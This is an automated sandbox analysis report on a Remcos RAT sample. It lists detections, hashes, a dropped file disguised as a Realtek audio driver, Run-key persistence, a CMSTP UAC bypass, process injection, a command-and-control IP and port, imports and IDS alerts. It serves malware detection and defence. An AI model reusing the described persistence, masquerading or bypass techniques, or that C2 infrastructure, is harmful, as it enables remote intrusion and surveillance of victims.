                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583735 Sample: 1.exe Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 33 geoplugin.net 2->33 39 Suricata IDS alerts for network traffic 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 18 other signatures 2->45 9 1.exe 2 4 2->9         started        13 Realtek Driver.exe 2->13         started        15 Realtek Driver.exe 2->15         started        17 Realtek Driver.exe 2->17         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\Realtek Driver.exe, PE32 9->29 dropped 31 C:\...\Realtek Driver.exe:Zone.Identifier, ASCII 9->31 dropped 55 Contains functionality to bypass UAC (CMSTPLUA) 9->55 57 Contains functionalty to change the wallpaper 9->57 59 Creates autostart registry keys with suspicious names 9->59 61 4 other signatures 9->61 19 Realtek Driver.exe 2 1 9->19         started        signatures6 process7 signatures8 47 Writes to foreign memory regions 19->47 49 Maps a DLL or memory area into another process 19->49 22 iexplore.exe 3 13 19->22         started        process9 dnsIp10 35 46.175.167.116, 2404, 49704 NORMA4-ASUA Ukraine 22->35 37 geoplugin.net 178.237.33.50, 49705, 49706, 80 ATOM86-ASATOM86NL Netherlands 22->37 51 Writes to foreign memory regions 22->51 53 Maps a DLL or memory area into another process 22->53 26 svchost.exe 22->26         started        signatures11 process12 signatures13 63 Contains functionality to bypass UAC (CMSTPLUA) 26->63 65 Found evasive API chain (may stop execution after checking mutex) 26->65 67 Contains functionalty to change the wallpaper 26->67 69 3 other signatures 26->69

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            1.exe79%VirustotalBrowse
                            1.exe87%ReversingLabsWin32.Backdoor.Remcos
                            1.exe100%AviraBDS/Backdoor.Gen
                            1.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe100%AviraBDS/Backdoor.Gen
                            C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe87%ReversingLabsWin32.Backdoor.Remcos
                            C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe79%VirustotalBrowse
                            No Antivirus matches
                            No Antivirus matches
                            No Antivirus matches
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            geoplugin.net
                            178.237.33.50
                            truefalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              http://geoplugin.net/json.gpfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://geoplugin.net/iexplore.exe, 00000003.00000003.2048131908.000000000318E000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000003.00000003.2048445024.000000000319F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://geoplugin.net/json.gp/C1.exe, Realtek Driver.exe.0.drfalse
                                    high
                                    http://geoplugin.net/json.gpliexplore.exe, 00000003.00000002.3265896381.000000000316F000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000003.00000003.2048131908.000000000316F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://geoplugin.net/json.gpjiexplore.exe, 00000003.00000003.2048131908.000000000316F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://geoplugin.net/json.gpIiexplore.exe, 00000003.00000003.2048131908.000000000316F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://geoplugin.net/json.gpSystem32iexplore.exe, 00000003.00000002.3265831941.00000000030BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://geoplugin.net/json.gpmiexplore.exe, 00000003.00000002.3265896381.000000000316F000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000003.00000003.2048131908.000000000316F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              46.175.167.116
                                              unknownUkraine
                                              56404NORMA4-ASUAtrue
                                              178.237.33.50
                                              geoplugin.netNetherlands
                                              8455ATOM86-ASATOM86NLfalse
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1583735
                                              Start date and time:2025-01-03 13:33:08 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 40s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:10
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:1.exe
                                              Detection:MAL
                                              Classification:mal100.rans.troj.spyw.expl.evad.winEXE@10/3@1/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 36
                                              • Number of non-executed functions: 371
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              TimeTypeDescription
                                              13:33:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Realtek Audio-J15M0S "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe"
                                              13:34:07AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Realtek Audio-J15M0S "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe"
                                              13:34:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Realtek Audio-J15M0S "C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe"
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              46.175.167.116m4VuyJtPKi.exeGet hashmaliciousRemcosBrowse
                                                178.237.33.50Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                • geoplugin.net/json.gp
                                                2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                94e.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                94e.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                nikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                                                • geoplugin.net/json.gp
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                geoplugin.netFaxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 178.237.33.50
                                                2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                94e.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                94e.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                nikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                NORMA4-ASUAm4VuyJtPKi.exeGet hashmaliciousRemcosBrowse
                                                • 46.175.167.116
                                                ATOM86-ASATOM86NLFaxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 178.237.33.50
                                                2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                94e.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                94e.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                SHROsQyiAd.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                nikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                                                • 178.237.33.50
                                                No context
                                                No context
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):963
                                                Entropy (8bit):5.019506780280991
                                                Encrypted:false
                                                SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzd:qlupdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                MD5:7459F6DA71CD5EAF9DBE2D20CA9434AC
                                                SHA1:4F60E33E15277F7A632D8CD058EC7DF4728B40BC
                                                SHA-256:364A445C3A222EE10A8816F78283BBD0503A5E5824B2A7F5DCD8E6DA9148AF6A
                                                SHA-512:3A862711D78F6F97F07E01ACC0DCB54F595A23AACEA9F2BB9606382805E1E92C1ACE09E1446F312F3B6D4EE63435ABEF46F0C16F015BD505347A1BCF2E149841
                                                Malicious:false
                                                Reputation:low
                                                Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                Process:C:\Users\user\Desktop\1.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):494592
                                                Entropy (8bit):6.600369249302876
                                                Encrypted:false
                                                SSDEEP:6144:G5zY+w1LqZBCxKedv//NEUn+N5hkf/0TE7RvIZ/jbsAORZzAXMcrztA4:G5k+Yqaxrh3Nln+N52fIA4jbsvZzSA4
                                                MD5:38C479083BA7387EBAD73F3B67020EAB
                                                SHA1:48BBD0BF1D333293C22C96B7731BA54343D7F8FE
                                                SHA-256:AF9A6206A5F41BCDF8567ADEE799D8C5141DA48776508C3C73617B2C140D84CB
                                                SHA-512:23632F540C6E287A31828CDB7EAC23CA5ACD8653908F6211FADAFB64734BAFCECB34F7A27F3EE843DCE054397B1AE5B723F467EBECA5D66D52320BA7909F7FBE
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\Realtek Audio\Realtek Driver.exe, Author: ditekSHen
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 87%
                                                • Antivirus: Virustotal, Detection: 79%, Browse
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L......g.................r...........J............@.......................... ...........................................................K.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...T]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....K.......L..................@..@.reloc...;.......<...P..............@..B................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\1.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):6.600369249302876
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:1.exe
                                                File size:494'592 bytes
                                                MD5:38c479083ba7387ebad73f3b67020eab
                                                SHA1:48bbd0bf1d333293c22c96b7731ba54343d7f8fe
                                                SHA256:af9a6206a5f41bcdf8567adee799d8c5141da48776508c3c73617b2c140d84cb
                                                SHA512:23632f540c6e287a31828cdb7eac23ca5acd8653908f6211fadafb64734bafcecb34f7a27f3ee843dce054397b1ae5b723f467ebeca5d66d52320ba7909f7fbe
                                                SSDEEP:6144:G5zY+w1LqZBCxKedv//NEUn+N5hkf/0TE7RvIZ/jbsAORZzAXMcrztA4:G5k+Yqaxrh3Nln+N52fIA4jbsvZzSA4
                                                TLSH:2FB4AE01BAD1C072D97514300D3AF776EAB8BD201836497B73DA1D5BFE31190A72AAB7
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~...~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..
                                                Icon Hash:95694d05214c1b33
                                                Entrypoint:0x434a80
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6710C0B1 [Thu Oct 17 07:45:53 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:1
                                                File Version Major:5
                                                File Version Minor:1
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:1
                                                Import Hash:1389569a3a39186f3eb453b501cfe688
                                                Instruction
                                                call 00007F5344BD6E6Bh
                                                jmp 00007F5344BD68B3h
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 00000324h
                                                push ebx
                                                push esi
                                                push 00000017h
                                                call 00007F5344BF9103h
                                                test eax, eax
                                                je 00007F5344BD6A27h
                                                mov ecx, dword ptr [ebp+08h]
                                                int 29h
                                                xor esi, esi
                                                lea eax, dword ptr [ebp-00000324h]
                                                push 000002CCh
                                                push esi
                                                push eax
                                                mov dword ptr [00471D14h], esi
                                                call 00007F5344BD8E76h
                                                add esp, 0Ch
                                                mov dword ptr [ebp-00000274h], eax
                                                mov dword ptr [ebp-00000278h], ecx
                                                mov dword ptr [ebp-0000027Ch], edx
                                                mov dword ptr [ebp-00000280h], ebx
                                                mov dword ptr [ebp-00000284h], esi
                                                mov dword ptr [ebp-00000288h], edi
                                                mov word ptr [ebp-0000025Ch], ss
                                                mov word ptr [ebp-00000268h], cs
                                                mov word ptr [ebp-0000028Ch], ds
                                                mov word ptr [ebp-00000290h], es
                                                mov word ptr [ebp-00000294h], fs
                                                mov word ptr [ebp-00000298h], gs
                                                pushfd
                                                pop dword ptr [ebp-00000264h]
                                                mov eax, dword ptr [ebp+04h]
                                                mov dword ptr [ebp-0000026Ch], eax
                                                lea eax, dword ptr [ebp+04h]
                                                mov dword ptr [ebp-00000260h], eax
                                                mov dword ptr [ebp-00000324h], 00010001h
                                                mov eax, dword ptr [eax-04h]
                                                push 00000050h
                                                mov dword ptr [ebp-00000270h], eax
                                                lea eax, dword ptr [ebp-58h]
                                                push esi
                                                push eax
                                                call 00007F5344BD8DEDh
                                                Programming Language:
                                                • [C++] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6eeb80x104.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x790000x4b10.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e0000x3bc8.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x6d3500x38.rdata
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x6d3e40x18.rdata
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x6d3880x40.rdata
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x590000x500.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x571f50x5720042490688bcf3aaa371282a7454b99e23False0.5716155173959828data6.625772280516175IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x590000x179dc0x17a008c19f58f5a4e5f2d5359d54234473252False0.5008370535714286data5.862025333737917IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x710000x5d540xe000eaccffe1cb836994ce5d3ccfb22d4f9False0.22126116071428573data3.0035180736120775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .tls0x770000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .gfids0x780000x2300x4009ca325bce9f8c0342c0381814603584aFalse0.330078125data2.3999762503719224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x790000x4b100x4c00195787389cf4bda4d8ef4d19559b36bdFalse0.28047902960526316data3.9853084673601744IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x7e0000x3bc80x3c0071caad037f5f2070293ebf9ebb49e4e2False0.764453125data6.724383647387111IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x7918c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                                                RT_ICON0x795f40x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.27704918032786885
                                                RT_ICON0x79f7c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.23686679174484052
                                                RT_ICON0x7b0240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.22977178423236513
                                                RT_RCDATA0x7d5cc0x503data1.0085736554949338
                                                RT_GROUP_ICON0x7dad00x3edataEnglishUnited States0.8064516129032258
                                                DLLImport
                                                KERNEL32.dllFindNextFileA, ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, UnmapViewOfFile, DuplicateHandle, CreateFileMappingW, MapViewOfFile, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, FindFirstFileA, FormatMessageA, FindNextVolumeW, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindFirstFileExA, ReadConsoleW, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, HeapReAlloc, GetACP, GetModuleHandleExW, MoveFileExW, RtlUnwind, RaiseException, LoadLibraryExW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, CompareStringW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, GetFileSize, TerminateThread, GetLastError, CreateDirectoryW, GetModuleHandleA, RemoveDirectoryW, MoveFileW, SetFilePointerEx, GetLogicalDriveStringsA, DeleteFileW, DeleteFileA, SetFileAttributesW, GetFileAttributesW, FindClose, lstrlenA, GetDriveTypeA, FindNextFileW, GetFileSizeEx, FindFirstFileW, GetModuleHandleW, ExitProcess, CreateMutexA, GetCurrentProcess, GetProcAddress, LoadLibraryA, CreateProcessA, PeekNamedPipe, CreatePipe, TerminateProcess, ReadFile, HeapFree, HeapCreate, CreateEventA, GetLocalTime, CreateThread, SetEvent, CreateEventW, WaitForSingleObject, Sleep, GetModuleFileNameW, CloseHandle, ExitThread, CreateFileW, WriteFile, SetConsoleOutputCP, InitializeCriticalSectionAndSpinCount, MultiByteToWideChar, DecodePointer, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetStartupInfoW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, WaitForSingleObjectEx, ResetEvent, SetEndOfFile
                                                USER32.dllGetMessageA, GetWindowTextW, wsprintfW, GetClipboardData, UnhookWindowsHookEx, GetForegroundWindow, ToUnicodeEx, GetKeyboardLayout, SetWindowsHookExA, CloseClipboard, OpenClipboard, GetKeyboardState, CallNextHookEx, GetKeyboardLayoutNameA, GetKeyState, GetWindowTextLengthW, DispatchMessageA, SetForegroundWindow, SetClipboardData, EnumWindows, ExitWindowsEx, EmptyClipboard, ShowWindow, SetWindowTextW, MessageBoxW, IsWindowVisible, CloseWindow, SendInput, EnumDisplaySettingsW, mouse_event, CreatePopupMenu, TranslateMessage, TrackPopupMenu, DefWindowProcA, CreateWindowExA, AppendMenuA, GetSystemMetrics, RegisterClassExA, GetCursorPos, SystemParametersInfoW, GetWindowThreadProcessId, MapVirtualKeyA, DrawIcon, GetIconInfo
                                                GDI32.dllBitBlt, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, StretchBlt, GetDIBits, DeleteObject, CreateDCA, GetObjectA, DeleteDC
                                                ADVAPI32.dllCryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameW, RegEnumKeyExA, QueryServiceStatus, CloseServiceHandle, OpenSCManagerW, OpenSCManagerA, ControlService, StartServiceW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegCreateKeyA, RegCloseKey, RegQueryInfoKeyW, RegQueryValueExA, RegCreateKeyExW, RegEnumKeyExW, RegSetValueExW, RegSetValueExA, RegOpenKeyExA, RegOpenKeyExW, RegCreateKeyW, RegDeleteValueW, RegEnumValueW, RegQueryValueExW, RegDeleteKeyA
                                                SHELL32.dllShellExecuteExA, Shell_NotifyIconA, ExtractIconA, ShellExecuteW
                                                ole32.dllCoInitializeEx, CoUninitialize, CoGetObject
                                                SHLWAPI.dllPathFileExistsW, PathFileExistsA, StrToIntA
                                                WINMM.dllwaveInOpen, waveInStart, waveInAddBuffer, PlaySoundW, mciSendStringA, mciSendStringW, waveInClose, waveInStop, waveInPrepareHeader, waveInUnprepareHeader
                                                WS2_32.dllgethostbyname, send, WSAStartup, closesocket, inet_ntoa, htons, htonl, getservbyname, ntohs, getservbyport, gethostbyaddr, inet_addr, WSASetLastError, WSAGetLastError, recv, connect, socket
                                                urlmon.dllURLOpenBlockingStreamW, URLDownloadToFileW
                                                gdiplus.dllGdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage, GdipGetImageEncoders, GdiplusStartup, GdipLoadImageFromStream
                                                WININET.dllInternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2025-01-03T13:33:59.542694+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.54970446.175.167.1162404TCP
                                                2025-01-03T13:34:01.143456+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549705178.237.33.5080TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 3, 2025 13:33:58.741472006 CET497042404192.168.2.546.175.167.116
                                                Jan 3, 2025 13:33:58.746318102 CET24044970446.175.167.116192.168.2.5
                                                Jan 3, 2025 13:33:58.746416092 CET497042404192.168.2.546.175.167.116
